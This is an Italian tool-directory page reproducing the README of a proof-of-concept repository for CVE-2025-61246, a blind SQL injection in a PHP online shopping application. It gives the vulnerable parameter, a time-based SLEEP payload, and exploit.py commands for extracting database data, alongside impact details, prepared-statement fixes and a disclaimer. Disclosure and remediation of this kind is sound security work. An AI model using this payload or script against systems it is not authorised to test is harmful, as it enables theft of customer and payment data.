Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-61246 — CVE-2025-61246: Vulnerabilità SQL Injection PoC in Online Shopping System PHP | Kitploit
Strumenti/GitHubGitHub/hackergovind/cve-2025-61246
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubhackergovind/cve-2025-61246

CVE-2025-61246

CVE-2025-61246: Vulnerabilità SQL Injection PoC in Online Shopping System PHP

Vedi Repository
7 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-61246 - Vulnerabilità di SQL Injection nel Sistema di Shopping Online

CVE Severity CVSS

Panoramica

Questa repository contiene una Proof of Concept (PoC) per CVE-2025-61246, una vulnerabilità critica di SQL Injection scoperta nell'applicazione PHP Online Shopping System. La vulnerabilità consente a un attaccante non autenticato di eseguire comandi SQL arbitrari tramite SQL injection cieca basata sul tempo (time-based blind).

Dettagli della Vulnerabilità

  • CVE ID: CVE-2025-61246
  • Tipo di Vulnerabilità: SQL Injection (Blind basata sul tempo)
  • Componente Interessato: /online-shopping-system-php-master/review_action.php
  • Versione Interessata: 1.0
  • Parametro Vulnerabile: proId
  • Vettore di Attacco: Rete (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
  • Gravità: Critica (Punteggio CVSS: 9.8)
  • Scopritore: Govind Pratap Singh

Descrizione Tecnica

La vulnerabilità è presente nell'endpoint review_action.php dove l'input fornito dall'utente tramite il parametro proId viene incorporato direttamente nelle query SQL senza un'adeguata sanitizzazione o l'uso di query parametrizzate. Ciò consente a un attaccante di iniettare payload SQL dannosi che possono:

  • Estrarre informazioni sensibili dal database
  • Bypassare i meccanismi di autenticazione
  • Modificare o eliminare record del database
  • Eseguire operazioni amministrative

Pattern di Codice Vulnerabile

root@kitploit:~
// Vulnerable code (example)
$proId = $_POST['proId'];
$query = "SELECT * FROM products WHERE id = " . $proId;
mysqli_query($conn, $query);

Vettori di Attacco

Un attaccante può sfruttare questa vulnerabilità:

  1. Inviando una richiesta POST appositamente predisposta a /online-shopping-system-php-master/review_action.php
  2. Includendo un payload SQL dannoso nel parametro proId
  3. Utilizzando tecniche di SQL injection cieca basata sul tempo per estrarre dati
  4. Sfruttando la vulnerabilità per ottenere accesso non autorizzato al database

Payload di Esempio

root@kitploit:~
proId=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -

Proof of Concept

Questa repository include:

  1. Script di Sfruttamento Automatico (exploit.py) - Script Python per rilevare e sfruttare la vulnerabilità
  2. Guida al Test Manuale (MANUAL_TESTING.md) - Istruzioni passo-passo per lo sfruttamento manuale
  3. Configurazione dell'Applicazione Vulnerabile (docker-compose.yml) - Ambiente Docker per test sicuri
  4. Guida alla Mitigazione (REMEDIATION.md) - Pratiche di codifica sicura e patch

Installazione e Utilizzo

Prerequisiti

root@kitploit:~
Python 3.7+
pip install -r requirements.txt

Avvio Rapido

root@kitploit:~
# Clone the repository
git clone https://github.com/hackergovind/CVE-2025-61246.git
cd CVE-2025-61246

# Install dependencies
pip install -r requirements.txt

# Run the exploit
python exploit.py --url http://target.com/online-shopping-system-php-master/review_action.php

Utilizzo Avanzato

root@kitploit:~
# Detection only (no exploitation)
python exploit.py --url http://target.com/review_action.php --detect-only

# Extract database name
python exploit.py --url http://target.com/review_action.php --extract-db

# Full exploitation with custom timeout
python exploit.py --url http://target.com/review_action.php --timeout 10 --full-exploit

# Use proxy for testing
python exploit.py --url http://target.com/review_action.php --proxy http://127.0.0.1:8080

Impatto

Lo sfruttamento riuscito di questa vulnerabilità può portare a:

  • Violazione dei Dati: Estrazione di informazioni sensibili degli utenti, credenziali e dati di pagamento
  • Bypass dell'Autenticazione: Accesso non autorizzato alle funzioni amministrative
  • Manipolazione dei Dati: Modifica o eliminazione di record critici del database
  • Compromissione Completa del Sistema: Potenziale esecuzione di codice remoto in determinate configurazioni

Mitigazione

Azioni Immediate

  1. Applicare la Validazione dell'Input: Implementare una validazione rigorosa dell'input per tutti i dati forniti dall'utente
  2. Utilizzare Query Parametrizzate: Sostituire l'SQL dinamico con prepared statement
  3. Implementare Regole WAF: Distribuire regole di Web Application Firewall per bloccare i tentativi di SQL injection
  4. Aggiornare l'Applicazione: Applicare le ultime patch di sicurezza

Esempio di Codice Sicuro

root@kitploit:~
// Secure implementation using prepared statements
$proId = $_POST['proId'];
$stmt = $conn->prepare("SELECT * FROM products WHERE id = ?");
$stmt->bind_param("i", $proId);
$stmt->execute();
$result = $stmt->get_result();

Per passaggi di mitigazione dettagliati, consultare REMEDIATION.md.

Riferimenti

  • OWASP SQL Injection
  • CWE-89: SQL Injection

Dichiarazione di Esclusione di Responsabilità

⚠️ IMPORTANTE: Questa PoC è fornita esclusivamente a scopo educativo e per test di sicurezza autorizzati. L'accesso non autorizzato ai sistemi informatici è illegale. L'autore non si assume alcuna responsabilità per l'uso improprio di queste informazioni. Ottenere sempre la dovuta autorizzazione prima di effettuare test.

Autore

Govind Pratap Singh

  • GitHub: @hackergovind
  • Email: [email protected]
  • Medium: https://medium.com/@govindsinghpratap123

Licenza

Questo progetto è rilasciato sotto la licenza MIT - vedere il file LICENSE per i dettagli.

Ringraziamenti

  • Team di Assegnazione CVE di MITRE
  • Fondazione OWASP
  • Comunità di Ricerca sulla Sicurezza

Divulgazione Responsabile: Se si scopre una vulnerabilità di sicurezza, si prega di segnalarla responsabilmente al fornitore prima della divulgazione pubblica.

Scarica lo strumento